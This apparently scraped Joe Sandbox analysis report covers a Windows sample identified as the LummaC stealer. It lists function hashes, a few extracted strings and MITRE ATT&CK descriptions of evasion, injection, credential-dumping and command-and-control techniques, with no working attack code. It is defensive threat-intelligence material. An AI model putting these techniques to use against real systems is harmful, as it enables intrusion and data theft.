API String ID: 237503144-1023387988
Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction ID: a6b40d0bcb7ce2f4606c78d1af6f6284a8976413e19e0a143a05982591abd443
Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction Fuzzy Hash: 1421F43424C344AFE3148F65E88175FBBE1EBC6714F25C92CE5A95B382D775C80A8B86

Function 00685A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00685B5B

Strings

B"@, xrefs: 00685A7F
rp, xrefs: 00685A9B
`J/H, xrefs: 00685A8D

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$`J/H$rp
API String ID: 237503144-3817236508
Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction ID: ea9bb2fae60931c4772cb0fb7a488c32aaf979fe4530414588f6d1e3cc8d019b
Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction Fuzzy Hash: FD31BCB0A443489FDB14DFA9D8827DEBBB2EF45700F10012CE441BB395D6B55906CFA9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DPlvBkg4aj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DPlvBkg4aj.exe_f3aec8244cf9d96c24b77ddebd7d9fdce36e4d3_34754915_ad9c4594-ba12-46c5-bc36-d9ade0714d88\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE346.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6B2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6F2.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
DPlvBkg4aj.exe

Function 0043B870 Relevance: 37.6, APIs: 11, Strings: 10, Instructions: 880
memorycomCOMMON

Function 00408880 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180
threadCOMMON

Function 0041BBA0 Relevance: 5.3, Strings: 4, Instructions: 325
COMMON

Function 00421E70 Relevance: 4.2, Strings: 3, Instructions: 435
COMMON

Function 006CA446 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0040AA32 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Function 0066003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0040E3D3 Relevance: 3.1, APIs: 2, Instructions: 120
COMMON

Function 00660E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON